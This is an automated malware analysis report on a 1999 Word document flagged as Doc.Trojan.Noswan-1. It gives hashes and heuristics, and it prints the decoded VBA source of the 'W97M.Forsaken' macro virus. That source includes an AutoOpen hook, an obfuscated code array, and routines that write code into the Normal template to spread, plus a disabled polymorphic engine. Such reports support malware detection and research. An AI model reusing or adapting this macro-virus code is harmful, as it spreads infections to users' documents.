Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d469c83cf2306be3…

MALICIOUS

Office (OLE)

68.0 KB Created: 1999-05-27 08:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 64edc1f411fbd145505dabbe86f4732b SHA-1: daf77f3f642dc9f9132879d9fd348ced58839c39 SHA-256: d469c83cf2306be3041d35e0ccf1455c66edd56a0dcb8c84906cda076a7e8b6c
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon opening. The script is obfuscated but appears to be designed to drop and execute a payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Noswan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Noswan-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15980 bytes
SHA-256: 90c0a8568c26a0a678f482314770c92510e0ab31879d6bf44e82e681dddcb9ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ForsakenRun()
Forsaken
End Sub




Attribute VB_Name = "Idee"
    ' =========================
    '  W97M.Forsaken ][
    '
    '  Unaufindbar von F/Win32
    '  Versteckt Code in Arrays
    '  PolyMorphicEngine SPE
    ' =========================

Public CodeContainer As Object
Public Runner As Object
Sub AutoOpen()
'On Error Resume Next
If MacroContainer = NormalTemplate Then
Set CodeContainer = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set Runner = Normal.ThisDocument
Else
Set CodeContainer = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set Runner = Project.ThisDocument
End If
'CodeContainer.AddFromString ("Sub ForsakenRun()" & vbCr & "Forsaken" & vbCr & "End Sub")
Drop
End Sub
Sub Drop()
'On Error Resume Next
Dim V$(40)

V$(1) = "p’ =cŒ��~ˆ‚‹EF"
V$(2) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘"
V$(3) = "l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=c~‰�‚"
V$(4) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=c~‰�‚"
V$(5) = "l�‘†Œ‹�K^‰‰Œ”c~�‘p~“‚=Z=c~‰�‚"
V$(6) = "^��‰†€~‘†Œ‹Ka†��‰~–^‰‚�‘�=Z=”�^‰‚�‘�kŒ‹‚"
V$(7) = "`ŒŠŠ~‹�_~��E?s†‚”?FK`Œ‹‘�Œ‰�E?p–Š Œ‰‰‚†�‘‚‹?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(8) = "`ŒŠŠ~‹�_~��E?cŒ�Š~‘?FK`Œ‹‘�Œ‰�E?cŒ�Š~‘“Œ�‰~„‚KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(9) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?j~ˆ�Œ?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(10) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?sŒ�‰~„‚‹=’‹�=^��Jf‹�KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(11) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?^‹�~��‚‹KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(12) = "p‚‘=^€=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
V$(13) = "p‚‘=kŒ=Z=kŒ�Š~‰q‚Š�‰~‘‚Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
V$(14) = "^€j=Z=`…�ETPF=H=`…�ENMMF=H=`…�ENMNF=H=`…�ENMNF"
V$(15) = "a~‘~=Z=?€Wy”†‹K�–�?"
V$(16) = "^��‰†€~‘†Œ‹Ks_bK^€‘†“‚s_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�E^€jFKb•�Œ�‘=a~‘~"
V$(17) = "^€f‹�=Z=c~‰�‚"
V$(18) = "kŒf‹�=Z=c~‰�‚"
V$(19) = "cŒ�=†=Z=N=qŒ=kŒK`Œ’‹‘"
V$(20) = "fƒ=kŒE†FKk~Š‚=Z=^€j=q…‚‹=kŒf‹�=Z=q�’‚"
V$(21) = "k‚•‘"
V$(22) = "cŒ�=†=Z=N=qŒ=^€K`Œ’‹‘"
V$(23) = "fƒ=^€E†FKk~Š‚=Z=^€j=q…‚‹=^€f‹�=Z=q�’‚"
V$(24) = "k‚•‘"
V$(25) = "fƒ=kŒf‹�=Z=c~‰�‚=q…‚‹"
V$(26) = "kŒKfŠ�Œ�‘=a~‘~"
V$(27) = "b‹�=fƒ"
V$(28) = "fƒ=^€f‹�=Z=c~‰�‚=q…‚‹"
V$(29) = "^€KfŠ�Œ�‘=a~‘~"
V$(30) = "b‹�=fƒ"
V$(31) = "fƒ=a~–EkŒ”EFF=Z=f‹‘Eo‹�=G=PMF=H=N=q…‚‹"
V$(32) = "====t†‘…=^��†�‘~‹‘Kk‚”_~‰‰ŒŒ‹"
V$(33) = "========K^‹†Š~‘†Œ‹=Z=Š�Œ^‹†Š~‘†Œ‹d‚‘^�‘�–"
V$(34) = "========Ke‚~�†‹„=Z=?tVTjKcŒ��~ˆ‚‹=™= –=g~€ˆ=q”Œƒ‰Œ”‚�Li—Œ=s•?"
V$(35) = "========Kf€Œ‹=Z=Š�Œf€Œ‹^‰‚�‘"
V$(36) = "========Kq‚•‘=Z=?fƒ=–Œ’=�‚~�=‘…†�I=–Œ’=~�‚=†‹ƒ‚€‘‚�>?"
V$(37) = "========Kp…Œ”"
V$(38) = "====b‹�=t†‘…"
V$(39) = "b‹�=fƒ"
V$(40) = "b‹�=p’ "

Application.ScreenUpdating = False

For i = 1 To 40
    
    For j = 1 To Len(V$(i))
        y = Asc(Mid$(V$(i), j, 1))
        z = y - 29
        If z < 0 Then z = z + 255
     
        x$ = x$ & Chr(c)
    Next j
    x$ = x$ & vbCr
Next

xl = CodeContainer.CountOfLines

CodeContainer.InsertLines (xl + 1), x$

If Runner = Normal.ThisDocument Then
NormalTemplate.Save
Else
ActiveDocument.SaveAs ActiveDocument.FullName
End If

'Runner.ForsakenRun

'xl = CodeContainer.CountOfLines

'For i = 1 To xl
'CodeContainer.Deletelines 1
'Next

'PolySize = Int(Rnd * 10)

'For PolyMorphic = 1 To PolySize

    'PolyString = ""
    'PolyLines = Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.CountOfLines

    'RndLine = Int(Rnd * PolyLines)
    'StringSize = Int(Rnd * 39) + 1

    'For SomeString = 1 To StringSize
    '    PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
    'Next SomeString
    
    'Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.InsertLines RndLine, "Rem " & PolyString

'Next PolyMorphic

If ActiveDocument.Saved = False Then _
ActiveDocument.SaveAs ActiveDocument.FullName
Application.ScreenUpdating = True
End Sub
' Jack Twoflower/LineZerØ Vx Team

' Thanks to:
' ==========
' Night
... (truncated)